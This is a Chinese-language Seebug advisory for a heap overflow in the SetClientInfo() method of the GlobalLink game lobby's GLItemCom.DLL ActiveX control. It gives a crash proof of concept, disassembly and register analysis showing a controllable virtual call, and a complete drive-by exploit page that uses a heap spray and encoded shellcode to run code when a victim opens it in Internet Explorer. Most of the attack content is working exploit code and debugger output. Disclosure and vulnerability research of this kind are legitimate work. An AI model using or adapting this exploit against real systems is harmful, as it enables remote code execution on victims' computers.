联众世界游戏大厅GLItemCom.DLL ActiveX控件堆溢出漏洞

2007-09-11T00:00:00
ID SSV:2200
Type seebug
Reporter Root
Modified 2007-09-11T00:00:00

Description

BUGTRAQ ID: 25565

联众世界游戏大厅是联众世界自主开发的一款集棋牌、休闲、对战于一体的游戏客户端。

联众世界游戏大厅所安装的GLItemCom.DLL ActiveX控件中SetClientInfo()函数存在堆溢出漏洞。

如果用户受骗使用IE访问了恶意网页的话,就可以触发这个溢出,导致在用户系统上执行任意指令。以下是已公开的PoC代码:

-----[Cut Below]------------------------------------------------------------------ <OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT> <SCRIPT> s=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" target.SetClientInfo(1, s, 1) </SCRIPT> -----[Cut Above]-------------------------------------------------------------------

运行PoC后,用ollydbg捕获异常为读取[41414145]无效地址访问异常,有漏洞的代码如下:

033D9315 |> \8B86 DC000000 MOV EAX,DWORD PTR DS:[ESI+DC] 033D931B |. 85C0 TEST EAX,EAX 033D931D |. 74 34 JE SHORT 033D9353 033D931F |. FF70 04 PUSH DWORD PTR DS:[EAX+4] ; /hWnd <=== 异常处 033D9322 |. FF15 F8523F03 CALL DWORD PTR DS:[<&USER32.IsWindow>] ; \IsWindow

此时的寄存器情况:

EAX 41414141 ECX 03442070 EDX 006900CD ASCII \"ox\" EBX 03442070 ESP 02B9FB2C EBP 02B9FB48 ESI 03441FD0 EDI 0344210C EIP 033D931F glitemfl.033D931F

EAX为“AAAA”,因此可以控制EAX的值,但是到这里还无法控制指令流程走向,接下来:

033D9328 |. 85C0 TEST EAX,EAX
033D932A |. 74 0F JE SHORT 033D933B ; eax为0,跳到0x033D933B 033D932C |. 8B86 DC000000 MOV EAX,DWORD PTR DS:[ESI+DC] 033D9332 |. FF70 04 PUSH DWORD PTR DS:[EAX+4] ; /hWnd 033D9335 |. FF15 44533F03 CALL DWORD PTR DS:[<&USER32.DestroyWindo>; \DestroyWindow 033D933B |> 8B8E DC000000 MOV ECX,DWORD PTR DS:[ESI+DC] ; ecx就是我们前面控制的eax的值 033D9341 |. 85C9 TEST ECX,ECX 033D9343 |. 74 07 JE SHORT 033D934C ; 如果ECX不等于0,不跳 033D9345 |. 8B01 MOV EAX,DWORD PTR DS:[ECX] 033D9347 |. 6A 01 PUSH 1
033D9349 |. FF50 0C CALL DWORD PTR DS:[EAX+C] ; 虚函数调用,可能控制 033D934C |> 83A6 DC000000>AND DWORD PTR DS:[ESI+DC],0 033D9353 |> 8D86 40010000 LEA EAX,DWORD PTR DS:[ESI+140]

从上面的代码流程分析可以看出[ESI+DC]释放的是一个对象指针,而且可被用户控制。这个对象的结构大致为:

+00h vmt_ptr +04h hWnd +08h ...

要利用成功,必须使得放hWnd的地址可读,且读出的hWnd为无效的窗口句柄,就可控制流程到0x033D933B,然后使得vmt_ptr指向的地址偏移0x0C处的地址指向shellcode,而这些条件在IE中很容易得到满足。

GlobalLink GlobalLink 2.7.0.8 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=\"http://www.ourgame.com/\" target=\"_blank\">http://www.ourgame.com/</a>

                                        
                                            
                                                &lt;OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574&gt;&lt;/OBJECT&gt;
&lt;SCRIPT&gt;
document.write(&quot;&lt;meta http-equiv=\&quot;refresh\&quot; content=\&quot;1, &quot; + window.location.href + &quot;\&quot;&gt;&lt;/meta&gt;&quot;);
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
//just pop up a MessageBox
&quot;%u0eeb%u4b5b%uc933%ubfb1%u3480%ufe0b%ufae2%u05eb&quot;+
&quot;%uede8%uffff%u17ff%ufe67%ufefe%u94a1%ua7ce%u759a&quot;+
&quot;%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc&quot;+
&quot;%uc716%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d&quot;+
&quot;%uaa8c%ue801%u166b%ufeda%ufefe%u96ac%u91d0%u998c&quot;+
&quot;%u9096%uce8a%u9693%u8edd%uca96%u8896%u9791%u759a&quot;+
&quot;%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af&quot;+
&quot;%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b&quot;+
&quot;%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6&quot;+
&quot;%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda&quot;+
&quot;%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b&quot;+
&quot;%ua7a0%u163d%u019c%u0101%u8acc%uf26f%u7187%u9e32&quot;+
&quot;%uf494%ue0c6%u3344%u4d2e%u3a4b%u968d%u929b%u9d92&quot;+
&quot;%u9a91%ufe9b&quot;
);

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape(&quot;%u0c0c%u0c0c&quot;);
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i&lt;heapBlocks;i++)
{
     memory[i] = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
   while (spraySlide.length*2&lt;spraySlideSize)
   {
     spraySlide += spraySlide;
   }
   spraySlide = spraySlide.substring(0,spraySlideSize/2);
   return spraySlide;
}

s=&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;+&quot;\x0c\x0c\x0c\x0c&quot;
target.SetClientInfo(1, s, 1)
&lt;/SCRIPT&gt;